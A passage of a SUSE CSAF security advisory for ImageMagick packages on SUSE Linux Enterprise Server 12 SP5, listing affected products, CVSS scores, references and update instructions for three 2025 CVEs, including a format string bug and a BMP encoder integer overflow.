"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "moderate"
}
],
"title": "CVE-2025-55212"
},
{
"cve": "CVE-2025-55298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55298"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to ImageMagick versions 6.9.13-28 and 7.1.2-2, a format string bug vulnerability exists in InterpretImageFilename function where user input is directly passed to FormatLocaleString without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55298",
"url": "https://www.suse.com/security/cve/CVE-2025-55298"
},
{
"category": "external",
"summary": "SUSE Bug 1248780 for CVE-2025-55298",
"url": "https://bugzilla.suse.com/1248780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "important"
}
],
"title": "CVE-2025-55298"
},
{
"cve": "CVE-2025-57803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-57803"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2 for ImageMagick\u0027s 32-bit build, a 32-bit integer overflow in the BMP encoder\u0027s scanline-stride computation collapses bytes_per_line (stride) to a tiny value while the per-row writer still emits 3 x width bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-57803",
"url": "https://www.suse.com/security/cve/CVE-2025-57803"
},
{
"category": "external",
"summary": "SUSE Bug 1248784 for CVE-2025-57803",
"url": "https://bugzilla.suse.com/1248784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "important"
}
],
"title": "CVE-2025-57803"
}
]
}
suse-su-2025:03152-1
Vulnerability from csaf_suse
Notes
{
